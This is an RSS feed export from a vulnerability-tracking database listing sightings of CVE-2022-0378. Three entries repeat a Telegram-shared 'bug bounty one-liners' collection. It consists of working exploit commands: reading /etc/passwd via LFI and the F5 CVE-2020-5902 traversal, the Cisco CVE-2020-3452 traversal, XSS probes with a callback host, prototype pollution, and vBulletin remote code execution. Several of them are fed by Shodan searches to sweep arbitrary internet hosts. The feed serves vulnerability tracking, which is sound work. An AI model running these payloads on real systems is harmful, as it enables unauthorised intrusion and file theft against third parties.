<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent sightings.</title>
    <link>https://db.gcve.eu</link>
    <description>Contains only the most 10 recent sightings.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Fri, 01 May 2026 20:14:24 +0000</lastBuildDate>
    <item>
      <title>5913412e-4e84-45d1-b6c5-4ad91e56b487</title>
      <link>https://db.gcve.eu/sighting/5913412e-4e84-45d1-b6c5-4ad91e56b487/export</link>
      <description>{"uuid": "5913412e-4e84-45d1-b6c5-4ad91e56b487", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-0378", "type": "seen", "source": "https://t.me/cibsecurity/36316", "content": "\u203c CVE-2022-0378 \u203c\n\nCross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-01-26T18:19:44.000000Z"}</description>
      <content:encoded>{"uuid": "5913412e-4e84-45d1-b6c5-4ad91e56b487", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-0378", "type": "seen", "source": "https://t.me/cibsecurity/36316", "content": "\u203c CVE-2022-0378 \u203c\n\nCross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-01-26T18:19:44.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/5913412e-4e84-45d1-b6c5-4ad91e56b487/export</guid>
      <pubDate>Wed, 26 Jan 2022 18:19:44 +0000</pubDate>
    </item>
    <item>
      <title>29cf55ce-624f-4408-bcc1-a139726267a0</title>
      <link>https://db.gcve.eu/sighting/29cf55ce-624f-4408-bcc1-a139726267a0/export</link>
      <description>{"uuid": "29cf55ce-624f-4408-bcc1-a139726267a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-0378", "type": "published-proof-of-concept", "source": "https://t.me/lostsec/328", "content": "Awesome One-liner Bug Bounty :\n\n&amp;gt; A collection of awesome one-liner scripts especially for bug bounty.\n\nThis repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily\u2665 welcome.\n\n## Definitions\n\nThis section defines specific terms or placeholders that are used throughout one-line command/scripts.\n\n- 1.1. \"HOST\" defines one hostname, (sub)domain, or IP address, e.g. replaced by internal.host, domain.tld, sub.domain.tld, or 127.0.0.1.\n- 1.2. \"HOSTS.txt\" contains criteria 1.1 with more than one in file.\n- 2.1. \"URL\" definitely defines the URL, e.g. replaced by http://domain.tld/path/page.html or somewhat starting with HTTP/HTTPS protocol.\n- 2.2. \"URLS.txt\" contains criteria 2.1 with more than one in file.\n- 3.1. \"FILE.txt\" or \"FILE{N}.txt\" means the files needed to run the command/script according to its context and needs.\n- 4.1. \"OUT.txt\" or \"OUT{N}.txt\" means the file as the target storage result will be the command that is executed.\n\n---\n\n### Local File Inclusion\n&amp;gt; @dwisiswant0\n\ngau HOST | gf lfi | qsreplace \"/etc/passwd\" | xargs -I% -P 25 sh -c 'curl -s \"%\" 2&amp;gt;&amp;amp;1 | grep -q \"root:x\" &amp;amp;&amp;amp; echo \"VULN! %\"'\n### Open-redirect\n&amp;gt; @dwisiswant0\n\nexport LHOST=\"URL\"; gau $1 | gf redirect | qsreplace \"$LHOST\" | xargs -I % -P 25 sh -c 'curl -Is \"%\" 2&amp;gt;&amp;amp;1 | grep -q \"Location: $LHOST\" &amp;amp;&amp;amp; echo \"VULN! %\"'\n&amp;gt; @N3T_hunt3r\ncat URLS.txt | gf url | tee url-redirect.txt &amp;amp;&amp;amp; cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk &amp;gt; /dev/null\n### XSS\n&amp;gt; @cihanmehmet\n\ngospider -S URLS.txt -c 10 -d 5 --blacklist \".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)\" --other-source | grep -e \"code-200\" | awk '{print $5}'| grep \"=\" | qsreplace -a | dalfox pipe | tee OUT.txt\n&amp;gt; @fanimalikhack\n\nwaybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt &amp;amp;&amp;amp; cat FILE.txt | dalfox -b YOURS.xss.ht pipe &amp;gt; OUT.txt\n&amp;gt; @oliverrickfors\n\ncat HOSTS.txt | getJS | httpx --match-regex \"addEventListener\\((?:'|\\\")message(?:'|\\\")\"\n### Prototype Pollution\n&amp;gt; @R0X4R\n\nsubfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt &amp;amp;&amp;amp; sed 's/$/\\/?__proto__[testparam]=exploit\\//' FILE.txt | page-fetch -j 'window.testparam == \"exploit\"? \"[VULNERABLE]\" : \"[NOT VULNERABLE]\"' | sed \"s/(//g\" | sed \"s/)//g\" | sed \"s/JS //g\" | grep \"VULNERABLE\"\n### CVE-2020-5902\n&amp;gt; @Madrobot_\n\nshodan search http.favicon.hash:-335242539 \"3992\" --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl --silent --path-as-is --insecure \"https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\" | grep -q root &amp;amp;&amp;amp; \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done\n### CVE-2020-3452\n&amp;gt; @vict0ni\n\nwhile read LINE; do curl -s -k \"https://$LINE/+CSCOT+/translation-table?type=mst&amp;amp;textdomain=/%2bCSCOE%2b/portal_inc.lua&amp;amp;default-language&amp;amp;lang=../\" | head | grep -q \"Cisco\" &amp;amp;&amp;amp; echo -e \"[${GREEN}VULNERABLE${NC}] $LINE\" || echo -e \"[${RED}NOT VULNERABLE${NC}] $LINE\"; done &amp;lt; HOSTS.txt\n### CVE-2022-0378\n&amp;gt; @7h3h4ckv157\n\ncat URLS.txt | while read h do; do curl -sk \"$h/module/?module=admin%2Fmodules%2Fmanage&amp;amp;id=test%22+onmousemove%3dalert(1)+xx=%22test&amp;amp;from_url=x\"|grep -qs \"onmouse\" &amp;amp;&amp;amp; echo \"$h: VULNERABLE\"; done\n### vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution\n&amp;gt; @Madrobot_\n\nshodan search http.favicon.hash:-601665621 --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&amp;amp;subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo &amp;amp;&amp;amp; \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done;\n### Find JavaScript Files\n&amp;gt; @D0cK3rG33k", "creation_timestamp": "2024-04-07T05:37:53.000000Z"}</description>
      <content:encoded>{"uuid": "29cf55ce-624f-4408-bcc1-a139726267a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-0378", "type": "published-proof-of-concept", "source": "https://t.me/lostsec/328", "content": "Awesome One-liner Bug Bounty :\n\n&amp;gt; A collection of awesome one-liner scripts especially for bug bounty.\n\nThis repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily\u2665 welcome.\n\n## Definitions\n\nThis section defines specific terms or placeholders that are used throughout one-line command/scripts.\n\n- 1.1. \"HOST\" defines one hostname, (sub)domain, or IP address, e.g. replaced by internal.host, domain.tld, sub.domain.tld, or 127.0.0.1.\n- 1.2. \"HOSTS.txt\" contains criteria 1.1 with more than one in file.\n- 2.1. \"URL\" definitely defines the URL, e.g. replaced by http://domain.tld/path/page.html or somewhat starting with HTTP/HTTPS protocol.\n- 2.2. \"URLS.txt\" contains criteria 2.1 with more than one in file.\n- 3.1. \"FILE.txt\" or \"FILE{N}.txt\" means the files needed to run the command/script according to its context and needs.\n- 4.1. \"OUT.txt\" or \"OUT{N}.txt\" means the file as the target storage result will be the command that is executed.\n\n---\n\n### Local File Inclusion\n&amp;gt; @dwisiswant0\n\ngau HOST | gf lfi | qsreplace \"/etc/passwd\" | xargs -I% -P 25 sh -c 'curl -s \"%\" 2&amp;gt;&amp;amp;1 | grep -q \"root:x\" &amp;amp;&amp;amp; echo \"VULN! %\"'\n### Open-redirect\n&amp;gt; @dwisiswant0\n\nexport LHOST=\"URL\"; gau $1 | gf redirect | qsreplace \"$LHOST\" | xargs -I % -P 25 sh -c 'curl -Is \"%\" 2&amp;gt;&amp;amp;1 | grep -q \"Location: $LHOST\" &amp;amp;&amp;amp; echo \"VULN! %\"'\n&amp;gt; @N3T_hunt3r\ncat URLS.txt | gf url | tee url-redirect.txt &amp;amp;&amp;amp; cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk &amp;gt; /dev/null\n### XSS\n&amp;gt; @cihanmehmet\n\ngospider -S URLS.txt -c 10 -d 5 --blacklist \".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)\" --other-source | grep -e \"code-200\" | awk '{print $5}'| grep \"=\" | qsreplace -a | dalfox pipe | tee OUT.txt\n&amp;gt; @fanimalikhack\n\nwaybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt &amp;amp;&amp;amp; cat FILE.txt | dalfox -b YOURS.xss.ht pipe &amp;gt; OUT.txt\n&amp;gt; @oliverrickfors\n\ncat HOSTS.txt | getJS | httpx --match-regex \"addEventListener\\((?:'|\\\")message(?:'|\\\")\"\n### Prototype Pollution\n&amp;gt; @R0X4R\n\nsubfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt &amp;amp;&amp;amp; sed 's/$/\\/?__proto__[testparam]=exploit\\//' FILE.txt | page-fetch -j 'window.testparam == \"exploit\"? \"[VULNERABLE]\" : \"[NOT VULNERABLE]\"' | sed \"s/(//g\" | sed \"s/)//g\" | sed \"s/JS //g\" | grep \"VULNERABLE\"\n### CVE-2020-5902\n&amp;gt; @Madrobot_\n\nshodan search http.favicon.hash:-335242539 \"3992\" --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl --silent --path-as-is --insecure \"https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\" | grep -q root &amp;amp;&amp;amp; \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done\n### CVE-2020-3452\n&amp;gt; @vict0ni\n\nwhile read LINE; do curl -s -k \"https://$LINE/+CSCOT+/translation-table?type=mst&amp;amp;textdomain=/%2bCSCOE%2b/portal_inc.lua&amp;amp;default-language&amp;amp;lang=../\" | head | grep -q \"Cisco\" &amp;amp;&amp;amp; echo -e \"[${GREEN}VULNERABLE${NC}] $LINE\" || echo -e \"[${RED}NOT VULNERABLE${NC}] $LINE\"; done &amp;lt; HOSTS.txt\n### CVE-2022-0378\n&amp;gt; @7h3h4ckv157\n\ncat URLS.txt | while read h do; do curl -sk \"$h/module/?module=admin%2Fmodules%2Fmanage&amp;amp;id=test%22+onmousemove%3dalert(1)+xx=%22test&amp;amp;from_url=x\"|grep -qs \"onmouse\" &amp;amp;&amp;amp; echo \"$h: VULNERABLE\"; done\n### vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution\n&amp;gt; @Madrobot_\n\nshodan search http.favicon.hash:-601665621 --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&amp;amp;subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo &amp;amp;&amp;amp; \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done;\n### Find JavaScript Files\n&amp;gt; @D0cK3rG33k", "creation_timestamp": "2024-04-07T05:37:53.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/29cf55ce-624f-4408-bcc1-a139726267a0/export</guid>
      <pubDate>Sun, 07 Apr 2024 05:37:53 +0000</pubDate>
    </item>
    <item>
      <title>bbeccac3-7bdd-4316-9adf-e28c1d41af99</title>
      <link>https://db.gcve.eu/sighting/bbeccac3-7bdd-4316-9adf-e28c1d41af99/export</link>
      <description>{"uuid": "bbeccac3-7bdd-4316-9adf-e28c1d41af99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-0378", "type": "published-proof-of-concept", "source": "Telegram/nStt2837JwMi-pNwVNAVKFW1pW6ax87VAsIJlp6SBOAsR3PR", "content": "", "creation_timestamp": "2024-04-07T22:52:53.000000Z"}</description>
      <content:encoded>{"uuid": "bbeccac3-7bdd-4316-9adf-e28c1d41af99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-0378", "type": "published-proof-of-concept", "source": "Telegram/nStt2837JwMi-pNwVNAVKFW1pW6ax87VAsIJlp6SBOAsR3PR", "content": "", "creation_timestamp": "2024-04-07T22:52:53.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/bbeccac3-7bdd-4316-9adf-e28c1d41af99/export</guid>
      <pubDate>Sun, 07 Apr 2024 22:52:53 +0000</pubDate>
    </item>
    <item>
      <title>ee44d5b7-4a3f-4534-8be7-d79abde3eec6</title>
      <link>https://db.gcve.eu/sighting/ee44d5b7-4a3f-4534-8be7-d79abde3eec6/export</link>
      <description>{"uuid": "ee44d5b7-4a3f-4534-8be7-d79abde3eec6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-0378", "type": "published-proof-of-concept", "source": "https://t.me/ctftm/604", "content": "Awesome One-liner Bug Bounty :\n\n&amp;gt; A collection of awesome one-liner scripts especially for bug bounty.\n\nThis repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily\u2665 welcome.\n\n## Definitions\n\nThis section defines specific terms or placeholders that are used throughout one-line command/scripts.\n\n- 1.1. \"HOST\" defines one hostname, (sub)domain, or IP address, e.g. replaced by internal.host, domain.tld, sub.domain.tld, or 127.0.0.1.\n- 1.2. \"HOSTS.txt\" contains criteria 1.1 with more than one in file.\n- 2.1. \"URL\" definitely defines the URL, e.g. replaced by http://domain.tld/path/page.html or somewhat starting with HTTP/HTTPS protocol.\n- 2.2. \"URLS.txt\" contains criteria 2.1 with more than one in file.\n- 3.1. \"FILE.txt\" or \"FILE{N}.txt\" means the files needed to run the command/script according to its context and needs.\n- 4.1. \"OUT.txt\" or \"OUT{N}.txt\" means the file as the target storage result will be the command that is executed.\n\n---\n\n### Local File Inclusion\n\ngau HOST | gf lfi | qsreplace \"/etc/passwd\" | xargs -I% -P 25 sh -c 'curl -s \"%\" 2&amp;gt;&amp;amp;1 | grep -q \"root:x\" &amp;amp;&amp;amp; echo \"VULN! %\"'\n### Open-redirect\n\nexport LHOST=\"URL\"; gau $1 | gf redirect | qsreplace \"$LHOST\" | xargs -I % -P 25 sh -c 'curl -Is \"%\" 2&amp;gt;&amp;amp;1 | grep -q \"Location: $LHOST\" &amp;amp;&amp;amp; echo \"VULN! %\"'\n```bash\ncat URLS.txt | gf url | tee url-redirect.txt &amp;amp;&amp;amp; cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk &amp;gt; /dev/null\n\n### XSS\n\nbash\ngospider -S URLS.txt -c 10 -d 5 --blacklist \".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)\" --other-source | grep -e \"code-200\" | awk '{print $5}'| grep \"=\" | qsreplace -a | dalfox pipe | tee OUT.txt\n\n\nbash\nwaybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt &amp;amp;&amp;amp; cat FILE.txt | dalfox -b YOURS.xss.ht pipe &amp;gt; OUT.txt\n\n\nbash\ncat HOSTS.txt | getJS | httpx --match-regex \"addEventListener\\((?:'|\\\")message(?:'|\\\")\"\n\n### Prototype Pollution\n\nbash\nsubfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt &amp;amp;&amp;amp; sed 's/$/\\/?proto[testparam]=exploit\\//' FILE.txt | page-fetch -j 'window.testparam == \"exploit\"? \"[VULNERABLE]\" : \"[NOT VULNERABLE]\"' | sed \"s/(//g\" | sed \"s/)//g\" | sed \"s/JS //g\" | grep \"VULNERABLE\"\n\n### CVE-2020-5902\n\nbash\nshodan search http.favicon.hash:-335242539 \"3992\" --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl --silent --path-as-is --insecure \"https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\" | grep -q root &amp;amp;&amp;amp; \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done\n\n### CVE-2020-3452\n\nbash\nwhile read LINE; do curl -s -k \"https://$LINE/+CSCOT+/translation-table?type=mst&amp;amp;textdomain=/%2bCSCOE%2b/portal_inc.lua&amp;amp;default-language&amp;amp;lang=../\" | head | grep -q \"Cisco\" &amp;amp;&amp;amp; echo -e \"[${GREEN}VULNERABLE${NC}] $LINE\" || echo -e \"[${RED}NOT VULNERABLE${NC}] $LINE\"; done &amp;lt; HOSTS.txt\n\n### CVE-2022-0378\n&amp;gt; @7h3h4ckv157\n\nbash\ncat URLS.txt | while read h do; do curl -sk \"$h/module/?module=admin%2Fmodules%2Fmanage&amp;amp;id=test%22+onmousemove%3dalert(1)+xx=%22test&amp;amp;from_url=x\"|grep -qs \"onmouse\" &amp;amp;&amp;amp; echo \"$h: VULNERABLE\"; done\n\n### vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution\n\nbash\nshodan search http.favicon.hash:-601665621 --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&amp;amp;subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo &amp;amp;&amp;amp; \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done;`\n\n### Find JavaScript Files\n====================\nJoin Our Telegram Channel\nhttps://t.me/ctftm", "creation_timestamp": "2024-05-04T18:47:12.000000Z"}</description>
      <content:encoded>{"uuid": "ee44d5b7-4a3f-4534-8be7-d79abde3eec6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-0378", "type": "published-proof-of-concept", "source": "https://t.me/ctftm/604", "content": "Awesome One-liner Bug Bounty :\n\n&amp;gt; A collection of awesome one-liner scripts especially for bug bounty.\n\nThis repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily\u2665 welcome.\n\n## Definitions\n\nThis section defines specific terms or placeholders that are used throughout one-line command/scripts.\n\n- 1.1. \"HOST\" defines one hostname, (sub)domain, or IP address, e.g. replaced by internal.host, domain.tld, sub.domain.tld, or 127.0.0.1.\n- 1.2. \"HOSTS.txt\" contains criteria 1.1 with more than one in file.\n- 2.1. \"URL\" definitely defines the URL, e.g. replaced by http://domain.tld/path/page.html or somewhat starting with HTTP/HTTPS protocol.\n- 2.2. \"URLS.txt\" contains criteria 2.1 with more than one in file.\n- 3.1. \"FILE.txt\" or \"FILE{N}.txt\" means the files needed to run the command/script according to its context and needs.\n- 4.1. \"OUT.txt\" or \"OUT{N}.txt\" means the file as the target storage result will be the command that is executed.\n\n---\n\n### Local File Inclusion\n\ngau HOST | gf lfi | qsreplace \"/etc/passwd\" | xargs -I% -P 25 sh -c 'curl -s \"%\" 2&amp;gt;&amp;amp;1 | grep -q \"root:x\" &amp;amp;&amp;amp; echo \"VULN! %\"'\n### Open-redirect\n\nexport LHOST=\"URL\"; gau $1 | gf redirect | qsreplace \"$LHOST\" | xargs -I % -P 25 sh -c 'curl -Is \"%\" 2&amp;gt;&amp;amp;1 | grep -q \"Location: $LHOST\" &amp;amp;&amp;amp; echo \"VULN! %\"'\n```bash\ncat URLS.txt | gf url | tee url-redirect.txt &amp;amp;&amp;amp; cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk &amp;gt; /dev/null\n\n### XSS\n\nbash\ngospider -S URLS.txt -c 10 -d 5 --blacklist \".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)\" --other-source | grep -e \"code-200\" | awk '{print $5}'| grep \"=\" | qsreplace -a | dalfox pipe | tee OUT.txt\n\n\nbash\nwaybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt &amp;amp;&amp;amp; cat FILE.txt | dalfox -b YOURS.xss.ht pipe &amp;gt; OUT.txt\n\n\nbash\ncat HOSTS.txt | getJS | httpx --match-regex \"addEventListener\\((?:'|\\\")message(?:'|\\\")\"\n\n### Prototype Pollution\n\nbash\nsubfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt &amp;amp;&amp;amp; sed 's/$/\\/?proto[testparam]=exploit\\//' FILE.txt | page-fetch -j 'window.testparam == \"exploit\"? \"[VULNERABLE]\" : \"[NOT VULNERABLE]\"' | sed \"s/(//g\" | sed \"s/)//g\" | sed \"s/JS //g\" | grep \"VULNERABLE\"\n\n### CVE-2020-5902\n\nbash\nshodan search http.favicon.hash:-335242539 \"3992\" --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl --silent --path-as-is --insecure \"https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\" | grep -q root &amp;amp;&amp;amp; \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done\n\n### CVE-2020-3452\n\nbash\nwhile read LINE; do curl -s -k \"https://$LINE/+CSCOT+/translation-table?type=mst&amp;amp;textdomain=/%2bCSCOE%2b/portal_inc.lua&amp;amp;default-language&amp;amp;lang=../\" | head | grep -q \"Cisco\" &amp;amp;&amp;amp; echo -e \"[${GREEN}VULNERABLE${NC}] $LINE\" || echo -e \"[${RED}NOT VULNERABLE${NC}] $LINE\"; done &amp;lt; HOSTS.txt\n\n### CVE-2022-0378\n&amp;gt; @7h3h4ckv157\n\nbash\ncat URLS.txt | while read h do; do curl -sk \"$h/module/?module=admin%2Fmodules%2Fmanage&amp;amp;id=test%22+onmousemove%3dalert(1)+xx=%22test&amp;amp;from_url=x\"|grep -qs \"onmouse\" &amp;amp;&amp;amp; echo \"$h: VULNERABLE\"; done\n\n### vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution\n\nbash\nshodan search http.favicon.hash:-601665621 --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&amp;amp;subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo &amp;amp;&amp;amp; \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done;`\n\n### Find JavaScript Files\n====================\nJoin Our Telegram Channel\nhttps://t.me/ctftm", "creation_timestamp": "2024-05-04T18:47:12.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/ee44d5b7-4a3f-4534-8be7-d79abde3eec6/export</guid>
      <pubDate>Sat, 04 May 2024 18:47:12 +0000</pubDate>
    </item>
    <item>
      <title>5df5980b-2039-4e40-9785-80ec3e76b5f0</title>
      <link>https://db.gcve.eu/sighting/5df5980b-2039-4e40-9785-80ec3e76b5f0/export</link>
      <description>{"uuid": "5df5980b-2039-4e40-9785-80ec3e76b5f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-0378", "type": "published-proof-of-concept", "source": "https://t.me/Secur_information_technology/50", "content": "Awesome One-liner Bug Bounty :\n\n&amp;gt; A collection of awesome one-liner scripts especially for bug bounty.\n\nThis repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily\u2665 welcome.\n\n## Definitions\n\nThis section defines specific terms or placeholders that are used throughout one-line command/scripts.\n\n- 1.1. \"HOST\" defines one hostname, (sub)domain, or IP address, e.g. replaced by internal.host, domain.tld, sub.domain.tld, or 127.0.0.1.\n- 1.2. \"HOSTS.txt\" contains criteria 1.1 with more than one in file.\n- 2.1. \"URL\" definitely defines the URL, e.g. replaced by http://domain.tld/path/page.html or somewhat starting with HTTP/HTTPS protocol.\n- 2.2. \"URLS.txt\" contains criteria 2.1 with more than one in file.\n- 3.1. \"FILE.txt\" or \"FILE{N}.txt\" means the files needed to run the command/script according to its context and needs.\n- 4.1. \"OUT.txt\" or \"OUT{N}.txt\" means the file as the target storage result will be the command that is executed.\n\n---\n\n### Local File Inclusion\n\n\ngau HOST | gf lfi | qsreplace \"/etc/passwd\" | xargs -I% -P 25 sh -c 'curl -s \"%\" 2&amp;gt;&amp;amp;1 | grep -q \"root:x\" &amp;amp;&amp;amp; echo \"VULN! %\"'\n### Open-redirect\n\n\nexport LHOST=\"URL\"; gau $1 | gf redirect | qsreplace \"$LHOST\" | xargs -I % -P 25 sh -c 'curl -Is \"%\" 2&amp;gt;&amp;amp;1 | grep -q \"Location: $LHOST\" &amp;amp;&amp;amp; echo \"VULN! %\"'\n\n`bash\ncat URLS.txt | gf url | tee url-redirect.txt &amp;amp;&amp;amp; cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk &amp;gt; /dev/null\n\n### XSS\n&amp;gt; @cihanmehmet\n\nbash\ngospider -S URLS.txt -c 10 -d 5 --blacklist \".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)\" --other-source | grep -e \"code-200\" | awk '{print $5}'| grep \"=\" | qsreplace -a | dalfox pipe | tee OUT.txt\n\n\n\nbash\nwaybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt &amp;amp;&amp;amp; cat FILE.txt | dalfox -b YOURS.xss.ht pipe &amp;gt; OUT.txt\n\n\n\nbash\ncat HOSTS.txt | getJS | httpx --match-regex \"addEventListener\\((?:'|\\\")message(?:'|\\\")\"\n\n### Prototype Pollution\n\n\nbash\nsubfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt &amp;amp;&amp;amp; sed 's/$/\\/?proto[testparam]=exploit\\//' FILE.txt | page-fetch -j 'window.testparam == \"exploit\"? \"[VULNERABLE]\" : \"[NOT VULNERABLE]\"' | sed \"s/(//g\" | sed \"s/)//g\" | sed \"s/JS //g\" | grep \"VULNERABLE\"\n\n### CVE-2020-5902\n\nbash\nshodan search http.favicon.hash:-335242539 \"3992\" --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl --silent --path-as-is --insecure \"https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\" | grep -q root &amp;amp;&amp;amp; \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done\n\n### CVE-2020-3452\n\n\nbash\nwhile read LINE; do curl -s -k \"https://$LINE/+CSCOT+/translation-table?type=mst&amp;amp;textdomain=/%2bCSCOE%2b/portal_inc.lua&amp;amp;default-language&amp;amp;lang=../\" | head | grep -q \"Cisco\" &amp;amp;&amp;amp; echo -e \"[${GREEN}VULNERABLE${NC}] $LINE\" || echo -e \"[${RED}NOT VULNERABLE${NC}] $LINE\"; done &amp;lt; HOSTS.txt\n\n### CVE-2022-0378\n\n\nbash\ncat URLS.txt | while read h do; do curl -sk \"$h/module/?module=admin%2Fmodules%2Fmanage&amp;amp;id=test%22+onmousemove%3dalert(1)+xx=%22test&amp;amp;from_url=x\"|grep -qs \"onmouse\" &amp;amp;&amp;amp; echo \"$h: VULNERABLE\"; done\n\n### vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution\n\n\nbash\nshodan search http.favicon.hash:-601665621 --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&amp;amp;subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo &amp;amp;&amp;amp; \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done;`\n\n### Find JavaScript Files", "creation_timestamp": 